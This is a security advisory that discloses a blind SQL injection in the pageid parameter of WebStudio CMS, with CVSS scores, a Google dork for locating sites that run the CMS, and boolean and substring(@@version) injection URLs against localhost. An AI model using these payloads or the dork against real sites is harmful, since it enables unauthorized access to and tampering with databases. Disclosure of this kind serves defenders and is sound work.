WebStudio CMS pageid Blind SQL Injection

2008.12.08
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Application: WebStudio CMS Vendor Name: BDigital Media Ltd Vendors Url: http://www.bdigital.biz Bug Type: WebStudio CMS (pageid) Blind SQL Injection Vulnerability Exploitation: Remote Severity: Critical Solution Status: Unpatched Introduction: WebStudio CMS is a modular Web Content Management System solution. Google Dork: "Powered by WebStudio" Description: WebStudio CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. PoC: http://localhost/index.php?pageid=1+and+1=1 ( TRUE ) http://localhost/index.php?pageid=1+and+1=2 ( FALSE ) Exploit: http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=3 ( TRUE ) http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=4 ( FALSE ) http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=5 ( FALSE ) Solution: There was no vendor-supplied solution at the time of entry. Edit source code manually to ensure user-supplied input is correctly sanitised. Credits: Charalambous Glafkos Email: glafkos (at) astalavista (dot) com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top